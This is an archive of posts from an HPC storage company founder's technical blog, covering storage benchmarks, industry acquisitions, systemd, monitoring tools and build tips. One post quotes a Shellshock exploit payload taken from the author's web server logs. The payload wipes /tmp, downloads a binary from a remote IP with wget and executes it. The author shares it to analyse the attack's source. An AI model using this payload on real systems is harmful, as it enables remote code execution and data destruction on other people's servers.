Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory as root on your machine mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
HPC in the critical path
Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn’t use it, as their time would be spent elsewhere.
Posts
Amusing
The IBM folks have turned the Blue Gene into what they claim is the worlds fastest blast engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.
Category: health
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Three years
Its been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. Its an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
When you cross the rubicon
… from hobby and sport, to something more. I’ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy … no really … and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.
Category: isp
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, using Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, have always been fairly high, in the multiple 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently, 0.5ms for the last 2 years.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Category: m-and-a
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
possible M&A: Dell and EMC?
Story is here. Not sure this is a great tie up … EMC has lots of things Dell doesn’t need (and vice versa). Possibly parts of EMC (secession from the federation?) with Dell. I can’t imagine VMware wanting to tie up with one vendor. Nor Pivotal, etc. This said, Cisco pulled out of the venture with EMC to pursue its own directions, competitive with elements. But then they bought and subsequently closed Whiptail.
Posts
M&A: Seagate snarfs up DotHill
The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn’t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A; is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and a culture/people fit matter. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. Its April fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and its setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Category: metadata
About
About
My name is Joe. I used to run a small revenue-backed high performance storage, cluster, and accelerated computing company named Scalable Informatics. We did all sorts of neat things like build really fast clusters, very fast and reliable storage systems, acceleration systems and software, tune code, parallelize applications, but you can follow the link if you would like more info. This blog isn’t about the company. I do what I can to maintain a positive outlook and a sense of humor.
Category: monitoring
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient whom, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And be more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple sudo make INSTALLPATH=/path/where/you/want/it It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Category: network
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22 This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Category: performance
Posts
Put my Riemann Zeta Function sum reduction code on github
Repo is here: https://github.com/joelandman/rzf. There’s a lightning talk to go along with it, and I’ll make sure I can get it together for this as well.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
Posts
Working on benchmarking ML frameworks
Nice machine we have here …
root@hermes:/data/tests# lspci | egrep -i '(AMD|NVidia)' | grep VGA 3b:00.0 VGA compatible controller: <a href="http://www.pny.com/nvidia-quadro-gp100">NVIDIA Corporation GP100GL</a> (rev a1) 88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] <a href="http://www.tomshardware.com/reviews/amd-radeon-vega-frontier-edition-16gb,5128.html">Vega 10 XTX</a> [Radeon Vega Frontier Edition] I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:
root@hermes:/data/tests# lscpu | grep "Model name" Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Hows this for a nice deskside system ... one of our Cadence boxen
For a partner. They made a request for something we’ve not built in a while … it had been end of lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer … built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Parallel building debian kernels ... and why its not working ... and how to make it work
So we build our own kernels. No great surprise, as we put our own patches in, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works, quite well. Same source, same patches, same make file driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But … but … parallel builds (e.g. leveraging more than 1 CPU) work only for the RPM builds.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those whom don’t know what this is, think of it this way.
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, using Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, have always been fairly high, in the multiple 2-3ms region, as compared to our other connection (using a different provider and a different technology) which has been consistently, 0.5ms for the last 2 years.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
